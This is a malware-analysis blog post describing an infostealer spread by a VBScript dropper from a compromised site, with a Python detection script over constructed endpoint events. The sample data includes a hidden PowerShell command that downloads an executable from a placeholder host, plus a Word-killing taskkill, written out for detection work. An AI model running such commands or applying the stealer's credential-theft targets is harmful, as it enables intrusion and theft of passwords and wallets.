Infostealer spreading through a compromised website

By: Tarun Dewan


The Zscaler ThreatLabZ team has uncovered a new password-stealer malware variant being delivered through a compromised website. The payload is compiled Microsoft Intermediate Language (MSIL) and steals passwords from the victim's system, browsers, and FTP software.

The payload analyzed in this blog was served from the compromised website dnoymuzik[.]com/wp-content/test/conhost[.]exe. 

Delivery vector

The delivery method for this malware is a VBScript file, which downloads the payload from the compromised website and also downloads a decoy document to lead the victim to believe that the downloaded files are legitimate. The VBScript performs the following activities:

  • Downloads a decoy document
  • Terminates the Microsoft Word process
  • Downloads the payload through a PowerShell command
  • Removes Microsoft Word's document recovery entries from the registry
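The four VBScript behaviours above form a small, detectable chain on the endpoint: a script host (wscript.exe/cscript.exe) spawning PowerShell with a download command, the same script host killing winword.exe, and a registry delete under Word's Resiliency key. The following detection logic is an added example written for this post, not code from Zscaler or the malware; it runs over constructed Sysmon-style process and registry events, and the Word Resiliency key path used for the recovery entries is an assumption.

```python
import json
import re

# Constructed Sysmon-style events, one JSON object per line (not real telemetry).
# Parent/child links are by pid/ppid; the Word Resiliency key is an assumed location
# for Word's document-recovery entries, and the URL is a placeholder host.
SAMPLE_EVENTS = r"""
{"type":"process","pid":1201,"ppid":800,"image":"C:\\Windows\\System32\\wscript.exe","cmdline":"wscript.exe C:\\Users\\u\\Downloads\\notice.vbs"}
{"type":"process","pid":1310,"ppid":1201,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -WindowStyle Hidden (New-Object Net.WebClient).DownloadFile('http://compromised-site.example/wp-content/test/conhost.exe','C:\\Users\\u\\AppData\\Local\\Temp\\conhost.exe')"}
{"type":"process","pid":1320,"ppid":1201,"image":"C:\\Windows\\System32\\taskkill.exe","cmdline":"taskkill /F /IM winword.exe"}
{"type":"registry","pid":1201,"op":"DeleteKey","key":"HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\DocumentRecovery"}
{"type":"process","pid":2000,"ppid":900,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe Get-Process"}
{"type":"process","pid":2100,"ppid":800,"image":"C:\\Windows\\System32\\wscript.exe","cmdline":"wscript.exe C:\\Scripts\\logon.vbs"}
"""

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Download indicators in a PowerShell command line spawned by a script host.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|https?://", re.I)


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_vbscript_dropper(event_lines):
    """Return {script_host_pid: [signal, ...]} for every script host that shows at
    least two of the dropper behaviours: PowerShell download, Word termination,
    removal of Word's document-recovery registry entries."""
    events = [json.loads(l) for l in event_lines.strip().splitlines() if l.strip()]
    image_by_pid = {e["pid"]: basename(e["image"]) for e in events if e["type"] == "process"}
    signals = {}

    def add(pid, signal):
        signals.setdefault(pid, []).append(signal)

    for e in events:
        if e["type"] == "process" and image_by_pid.get(e["ppid"]) in SCRIPT_HOSTS:
            child, cmd = basename(e["image"]), e["cmdline"]
            if child == "powershell.exe" and DOWNLOAD_RE.search(cmd):
                add(e["ppid"], "powershell_download")
            elif child == "taskkill.exe" and "winword" in cmd.lower():
                add(e["ppid"], "word_terminated")
        elif (e["type"] == "registry" and e.get("op") == "DeleteKey"
              and image_by_pid.get(e["pid"]) in SCRIPT_HOSTS
              and r"\word\resiliency" in e["key"].lower()):
            add(e["pid"], "word_recovery_entries_removed")
    # Requiring two signals keeps a lone admin script (e.g. a logon .vbs) from alerting.
    return {pid: s for pid, s in signals.items() if len(s) >= 2}


if __name__ == "__main__":
    print(detect_vbscript_dropper(SAMPLE_EVENTS))
```

On the sample data only the script host with pid 1201 is reported, with all three signals; the benign PowerShell and logon-script events produce nothing.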


Figure 1: Screen capture of VBScript activity

Figure 2: Screen capture decoy document

The decoy document poses as a "public service" message from a government organization and includes spam mitigation instructions. 

Once executed, the malware prepares for credential theft by checking for installed antivirus products and enumerating the directories and files from which it will steal information. Its most interesting function is that it also behaves like a file stealer: it enumerates files and folders, checks them for strings of interest, and uploads whatever sensitive data it finds to the malware's C&C (Figures 3 through 5):

Figure 3: Checking for installed antivirus products

Figure 4: Looking at directories and files for stealing passwords and collecting information

Figure 5: Checking for strings in the system with enumeration of various files and folders and upload to the C&C

The following screen captures show the file extensions the malware targets on the victim's machine when stealing credentials:

Figure 5: Strings of extensions

Figure 6: Strings of extensions

The screen captures below show snippets of the password-stealing routines for various browsers and applications, which run before the collected data is uploaded to the C&C server:

Figure 7: Chrome password stealer

Figure 8: Uploading to the C&C server

Figure 9: CuteFTP password stealer

Figure 10: Electrum Bitcoin password stealer

Figure 11: Firefox password stealer

The malware steals passwords from the following software and browsers:

  • Armory wallet
  • Chrome
  • Firefox
  • CuteFTP
  • FileZilla
  • PuTTY
  • Electrum Bitcoin wallet
  • WinSCP


Network communication:

Figure 12: Network information


Below is a snapshot of the data stolen from the victim's machine, as collected by the malware author:

Figure 13: Stolen data


This is yet another infostealer that attempts to steal stored credentials from a victim's machine. It also contains modules to steal sensitive files such as private keys, SSH keys, and Bitcoin wallets. ThreatLabZ will continue to monitor this malware to ensure that Zscaler customers are protected.

The Zscaler Cloud Sandbox report highlighting the indicators is shown in the screenshot below:

Figure 14: Zscaler Cloud Sandbox malware report
